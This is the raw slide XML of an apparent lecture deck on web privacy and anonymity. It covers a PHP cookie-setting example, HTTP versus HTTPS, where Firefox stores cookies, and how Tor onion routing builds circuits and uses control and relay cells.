              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	$cookie_name = "user";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	$cookie_value = "John Doe";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	setcookie($cookie_name, $cookie_value, time() + (86400 * 30), "/"); // 86400 = 1 day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17103928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 and HTTPS are the most frequently used protocols in the Application Layer. The former transmit data and credential information unencrypted while the latter encrypted them. " title="HTTP and HTTPS"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="338362" y="1316776"/>
            <a:ext cx="7579004" cy="4687663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="365126"/>
            <a:ext cx="7886700" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP vs. HTTPs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12519159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Routing in Normal Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="In Internet, routing is a typically implemented in a store and forward scheme. Packets from the sender will pass through a number of routers before reaching to the destinations. Depends on the traffic of the network, each router may tentatively store the packets for a while until it detects the availability of the forwarding port. " title="Routing "/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="529390" y="1870163"/>
            <a:ext cx="7613583" cy="3781992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31153232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AB9FB-9005-436C-AD2E-EFCCB07D98EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tor Onion Routing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E4B3EA4-A92A-40BB-9A6A-20138FDAF7A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Tor software is program that will anonymize online presence. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tor bounces communication around a distributed network of relays</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Messages are put in a cells and unwrapped at each node or with a symmetric key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>The ORs only know the successor or predecessor but not any other OR.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30967569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Message Encryption along Onion Routing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="As depicted here, Tor encrypts the message multiple times using the symmetric sessions keys between the sender and the onion routers according to the order of the routers the data is going through. This scheme not only ensures the routing but also limits the knowledge exposed to the ORs." title="Tor schem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27766" y="1825625"/>
            <a:ext cx="6488468" cy="43513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4923050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Tor Router Design</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tor is an overlay network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each router has a user-level process without special privileges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each OR maintains a TLS connection to every other OR.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each user runs a local software called onion proxy to fetch directories, establish circuits across the network, and handle connections from users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each router maintains a long – term and short – term onion identity key. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38669008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Tor Cell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tor uses cells to pass the data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Traffic passes along the connections in fixed-size cells which are 512 bytes with a header and a payload. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The header determines which circuit the cell refers to and a command to describe what to do about the payload.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two types of cells</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control cells</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interpreted by the receiving nodes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relay cells</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Carry end – to – end stream data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contains additional header containing the streamID, integrity checksum, payload length and relay command.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10898449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ell of 512 bytes is a unit datagram in Tor. It consists of a header and a payload. Based on the cell types, it can be categorized as Control cells or Relay cells. In a control cell, the header contains a two-byte circuit identifier to tell which circuit the cell is for and a one-byte command field to specify what to do with the payload. The remaining 509 bytes are data. In a relay cell, the header contains a two-by circuit identifier, a one-bye relay tag, a two-bye stream identifer (to specify which stream this cell is for while multiple streams sharing the circuit), a six-byte digest for integrity check, a two-byte length, and a one-byte relay command. The remaining 498 bytes are data. " title="Tor Cell"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="941345" y="1459524"/>
            <a:ext cx="7439025" cy="4629150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="365126"/>
            <a:ext cx="7886700" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tor Cell Header and Payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22183511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Control Commands </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1690689"/>
            <a:ext cx="7886700" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Padding: keepalive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create/Created: set up a new circuit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create-fast/Created-fast: set up a new circuit with the first hop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Netinfo: help the nodes to find the time and their address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Destroy: tear down a circuit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8187222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Relay Commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relay Data: down stream data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relay begin: open stream</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relay end: close stream</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relay teardown: close a broken stream</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relay connected: notify the begin of relay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relay extend: to extend the circuit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relay send me: congestion control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relay drop: implements long range dummies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1855364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his table lists the control command and relay commands discussed in the last two slides " title="Commands in Cells"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="903248" y="1382751"/>
            <a:ext cx="7137396" cy="4916873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="365126"/>
            <a:ext cx="7886700" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summary of Commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25443604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628650" y="365125"/>
            <a:ext cx="7886700" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie File</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14338" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628649" y="1825625"/>
            <a:ext cx="8147797" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reside in user’s application data directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>\Users\”username”\AppData\Roaming\Mozilla\Firefox\Profiles\ta67nipo.default\cookies.sqlite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reside in user’s directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>~/.mozilla/firefox/&lt;profile name&gt;/cookies.sqlite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28589826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136286"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example of T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esign</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301625" y="1527175"/>
            <a:ext cx="8504238" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2057400" lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="B39E00"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28676" name="Picture 2" descr="Onion Routing originally built one circuit for each TCP stream. Because building a circuit can take several tenths of a second (due to public-key cryptography and network latency), this design imposed high costs on applications like web browsing that open many TCP streams.&#10;In Tor, each circuit can be shared by many TCP streams. To avoid delays, users construct circuits preemptively. To limit linkability among their streams, users' Onion Proxies (OP) build a new circuit periodically if the previous ones have been used, and expire old used circuits that no longer have any open streams. OPs consider rotating to a new circuit once a minute: thus even heavy users spend negligible time building circuits, but a limited number of requests can be linked to each other through a given exit node. Also, because circuits are built in the background, OPs can recover from failed circuit creation without harming user experience.&#10;&#10;Constructing a circuit&#10;&#10;A user's OP constructs circuits incrementally, negotiating a symmetric key with each OR on the circuit, one hop at a time. To begin creating a new circuit, the OP (call her Alice) sends a create cell to the first node in her chosen path (call him Bob). (She chooses a new circID CAB not currently used on the connection from her to Bob.) The create cell's payload contains the first half of the Diffie-Hellman handshake (gx), encrypted to the onion key of Bob. Bob responds with a created cell containing gy along with a hash of the negotiated key K=g^xy.&#10;Once the circuit has been established, Alice and Bob can send one another relay cells encrypted with the negotiated key.1 More detail is given in the next section.&#10;To extend the circuit further, Alice sends a relay extend cell to Bob, specifying the address of the next OR (call her Carol), and an encrypted gx2 for her. Bob copies the half-handshake into a create cell, and passes it to Carol to extend the circuit. (Bob chooses a new circID CBC not currently used on the connection between him and Carol. Alice never needs to know this circID; only Bob associates CAB on his connection with Alice to CBC on his connection with Carol.) When Carol responds with a created cell, Bob wraps the payload into a relay extended cell and passes it back to Alice. Now the circuit is extended to Carol, and Alice and Carol share a common key K_2 = g^(x2 y2).&#10;To extend the circuit to a third node or beyond, Alice proceeds as above, always telling the last node in the circuit to extend one hop further.&#10;This circuit-level handshake protocol achieves unilateral entity authentication (Alice knows she's handshaking with the OR, but the OR doesn't care who is opening the circuit — Alice uses no public key and remains anonymous) and unilateral key authentication (Alice and the OR agree on a key, and Alice knows only the OR learns it). It also achieves forward secrecy and key freshness. More formally, the protocol is as follows (where EPKBob(·) is encryption with Bob's public key, H is a secure hash function, and | is concatenation):&#10;Alice -&gt; Bob : EPKBob(gx)&#10;Bob -&gt; Alice  : gy, H(K | &quot;handshake&quot;)&#10;In the second step, Bob proves that it was he who received gx, and who chose y. We use PK encryption in the first step (rather than, say, using the first two steps of STS, which has a signature in the second step) because a single cell is too small to hold both a public key and a signature. Preliminary analysis with the NRL protocol analyzer [35] shows this protocol to be secure (including perfect forward secrecy) under the traditional Dolev-Yao model." title="Tor Desgin (refer the link for detail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031" y="1624739"/>
            <a:ext cx="8319869" cy="3977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TextBox 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="980206" y="6015364"/>
            <a:ext cx="7620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i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://svn.torproject.org/svn/projects/design-paper/tor-design.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28679" name="TextBox 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1068405" y="5607844"/>
            <a:ext cx="6629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t>Alice builds a two-hop circuit and begins fetching a web page.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12060165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Relay Cells</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Once a connection is established a user can send relay cells</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
